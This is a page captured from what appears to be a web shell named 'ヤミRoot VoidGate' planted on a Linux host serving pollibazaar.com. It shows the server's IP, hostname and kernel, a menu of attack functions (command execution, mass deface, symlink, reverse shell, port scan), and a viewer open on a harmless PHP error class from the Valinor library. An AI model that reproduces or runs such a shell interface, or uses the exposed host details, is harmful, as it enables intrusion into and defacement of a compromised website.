ヤミRoot VoidGate
User / IP
:
216.73.217.162
Host / Server
:
15.235.182.215 / pollibazaar.com
System
:
Linux asia.cbnex.com 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
pollibazaar
/
public_html
/
vendor
/
cuyz
/
valinor
/
src
/
Mapper
/
Viewing: ArgumentsMapperError.php
<?php declare(strict_types=1); namespace CuyZ\Valinor\Mapper; use CuyZ\Valinor\Mapper\Tree\Message\Messages; use CuyZ\Valinor\Mapper\Tree\Message\NodeMessage; use CuyZ\Valinor\Utility\ValueDumper; use RuntimeException; /** @internal */ final class ArgumentsMapperError extends RuntimeException implements MappingError { private Messages $messages; private string $type; private mixed $source; /** * @param non-empty-list<NodeMessage> $messages */ public function __construct(mixed $source, string $type, string $function, array $messages) { $this->messages = new Messages(...$messages); $this->type = $type; $this->source = $source; $errorsCount = count($messages); if ($errorsCount === 1) { $body = $messages[0] ->withBody("Could not map arguments of `$function`. An error occurred at path {node_path}: {original_message}") ->toString(); } else { $source = ValueDumper::dump($source); $body = "Could not map arguments of `$function` with value $source. A total of $errorsCount errors were encountered."; } parent::__construct($body); } public function messages(): Messages { return $this->messages; } public function type(): string { return $this->type; } public function source(): mixed { return $this->source; } }
Coded With 💗 by
0x6ick